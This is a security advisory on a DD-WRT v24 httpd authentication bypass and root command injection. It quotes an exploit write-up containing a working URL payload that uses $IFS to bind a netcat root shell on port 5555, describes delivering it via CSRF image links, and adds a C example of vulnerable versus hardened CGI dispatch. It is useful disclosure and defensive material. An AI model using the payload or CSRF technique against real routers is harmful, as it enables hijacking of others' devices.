An input-validation flaw has been found in the web interface (httpd) of DD-WRT v24. An unauthenticated remote attacker can use a specially crafted URL to bypass the interface's authentication: a request whose path contains "cgi-bin" is still handed to /bin/sh before the 401 response is sent, so anything following ";" in the path is executed as a system command. Because httpd runs as "root", the commands run with root privileges.
DD-WRT is an unofficial (third-party) firmware for routers such as Linksys, D-Link and La Fonera, among others. It is translated into more than ten languages, supports IPv6 and Wi-Fi with several types of encryption, allows VPNs to be set up and even has a VoIP build, among the usual router services.
The flaw has been published as an exploit with full details (there is even a video). The exploit uses the injection to start a netcat listener that binds a root shell to TCP port 5555 on the router.
Fortunately, the interface is only reachable from the local network unless remote administration has been enabled. Note, however, that the exploit author points out it can still be triggered from the LAN side by CSRF (for example an image link on a web page visited from behind the router) without any authenticated session. The vulnerability has been acknowledged and a patch that fixes it is already available.
More information:
Official DD-WRT website
http://www.dd-wrt.com/dd-wrtv3/index.php
Patch download
http://www.dd-wrt.com/dd-wrtv2/down.php
This is a remote root vulnerability in DD-WRT's httpd server. The bug exists
in the latest 24 sp1 version of the firmware.
The problem is due to many bugs and bad software design decisions. Here is
part of httpd.c:
859 if (containsstring(file, "cgi-bin")) {
860
861 auth_fail = 0;
862 if (!do_auth
863 (conn_fp, auth_userid, auth_passwd, auth_realm,
864 authorization, auth_check))
865 auth_fail = 1;
......... (snip)............
899
900 }
901 exec = fopen("/tmp/exec.tmp", "wb");
902 fprintf(exec, "export REQUEST_METHOD=\"%s\"\n", method);
903 if (query)
904 fprintf(exec, "/bin/sh %s/%s/tmp/shellout.asp");
........... (snip)..........
926 if (auth_fail == 1) {
927 send_authenticate(auth_realm);
928 auth_fail = 0;
------------
3) issue 3: httpd runs as root :)
Now let's sum up (1), (2) and (3). Any unauthenticated attacker that can
connect to the management web interface can easily get root on the device via
his browser with a URL like:
http://routerIP/cgi-bin/;command_to_execute
There is a catch though: whitespaces break it. Anyway, they can easily be
replaced with a shell variable like $IFS. So, getting a root shell at 5555/tcp
becomes as easy as typing this in your browser's URL bar:
http://routerIP/cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh
Voila (pretty old-school, eheh). Here is a (poor) video demonstrating the
problem:
http://www.youtube.com/watch?v=UhDcXCVFrvM
Fortunately, httpd by default does not listen on the outbound interface.
However, this vulnerability can be exploited via a CSRF attack (the dd-wrt
device's owner does not even need to have an authenticated session on the web
UI, which is bad, bad). However, a basic authentication dialog will appear. In
IE even this can be suppressed, see this one:
http://ha.ckers.org/blog/20090630/csrf-and-ignoring-basicdigest-auth/
Unlike the already documented CSRF vulnerability
(http://www.securityfocus.com/bid/32703), this DOES NOT need an authenticated
session. This means someone can even post a crafted [img] link on a forum
and a dd-wrt router owner visiting the forum will get owned :)
A weird vulnerability you're unlikely to see in 2009 :) Quite embarrassing I
would say :)
Thanks krassyo at krassyo.info for his support :)
Leka vecher :)
# milw0rm.com [2009-07-20]
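The following is an added example, not code from DD-WRT's httpd.c or from the advisory above. It models the dispatch pattern the advisory describes (the auth result is only recorded in a flag, the request path is pasted into a shell command and run, and the 401 goes out afterwards) next to a hardened version that fails closed before doing any work, accepts only a bare script name from a fixed character set, and never passes the name through a shell. The function names, the CGI_ROOT path and the /www document root are assumptions made for the example. The payload string reproduces the advisory's URL; the backslash before 5555 is needed because the shell would otherwise read `$IFS5555` as one (empty) variable name.

```c
/* Added example: vulnerable CGI dispatch pattern beside a hardened one.
 * Not DD-WRT code; names and paths are hypothetical. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define CGI_ROOT "/www/cgi-bin"   /* assumed location of CGI scripts */

enum cgi_result { CGI_RUN = 0, CGI_DENIED = 1, CGI_BAD_NAME = 2 };

/* Vulnerable pattern: authentication failure is remembered in a flag, the
 * raw request path is written into a shell command and executed, and the
 * 401 is only sent afterwards. Everything after "cgi-bin" in the URL,
 * including ";cmd", is interpreted by /bin/sh (as root in the real case). */
static enum cgi_result cgi_dispatch_vulnerable(const char *path, int authenticated,
                                               char *cmd, size_t cmdlen)
{
    int auth_fail = 0;
    if (strstr(path, "cgi-bin") == NULL)
        return CGI_BAD_NAME;
    if (!authenticated)
        auth_fail = 1;            /* noted, but nothing stops execution */

    /* equivalent of writing "/bin/sh <docroot><path>" into a temp script */
    snprintf(cmd, cmdlen, "/bin/sh /www%s", path);
    /* ... in the real server the script is executed here ... */

    if (auth_fail)
        return CGI_DENIED;        /* 401 goes out after the command ran */
    return CGI_RUN;
}

/* Allow only a plain file name: letters, digits, '_', '-', '.', no leading
 * dot (blocks ".." and hidden files), so ';', '$', '/' and whitespace are
 * all rejected before they could reach any interpreter. */
static int is_safe_cgi_name(const char *name)
{
    size_t n = strlen(name);
    if (n == 0 || n > 64 || name[0] == '.')
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!(isalnum(c) || c == '_' || c == '-' || c == '.'))
            return 0;
    }
    return 1;
}

/* Hardened pattern: deny first, validate the name, and produce a path that
 * is meant for execve() directly, so shell metacharacters and $IFS tricks
 * have no meaning. cmd is left empty whenever nothing should run. */
static enum cgi_result cgi_dispatch_fixed(const char *path, int authenticated,
                                          char *cmd, size_t cmdlen)
{
    const char *prefix = "/cgi-bin/";
    cmd[0] = '\0';
    if (!authenticated)
        return CGI_DENIED;        /* fail closed before any work */
    if (strncmp(path, prefix, strlen(prefix)) != 0)
        return CGI_BAD_NAME;
    const char *name = path + strlen(prefix);
    if (!is_safe_cgi_name(name))
        return CGI_BAD_NAME;
    snprintf(cmd, cmdlen, "%s/%s", CGI_ROOT, name);
    return CGI_RUN;
}

int main(void)
{
    char cmd[256];
    /* the advisory's payload, as a constructed sample request path */
    const char *payload = "/cgi-bin/;nc$IFS-l$IFS-p$IFS\\5555$IFS-e$IFS/bin/sh";
    enum cgi_result r = cgi_dispatch_vulnerable(payload, 0, cmd, sizeof cmd);
    printf("vulnerable: result=%d cmd=%s\n", r, cmd);
    r = cgi_dispatch_fixed(payload, 0, cmd, sizeof cmd);
    printf("fixed: result=%d cmd=\"%s\"\n", r, cmd);
    r = cgi_dispatch_fixed("/cgi-bin/status.cgi", 1, cmd, sizeof cmd);
    printf("fixed, valid request: result=%d cmd=%s\n", r, cmd);
    return 0;
}
```

Running it shows the vulnerable dispatcher producing `/bin/sh /www/cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh` for an unauthenticated request (the 401 is irrelevant once that has run), while the hardened one returns CGI_DENIED with an empty command and, even for an authenticated caller, rejects the same path as a bad name. The order of the checks is the point: authorization must gate execution, not just the response code.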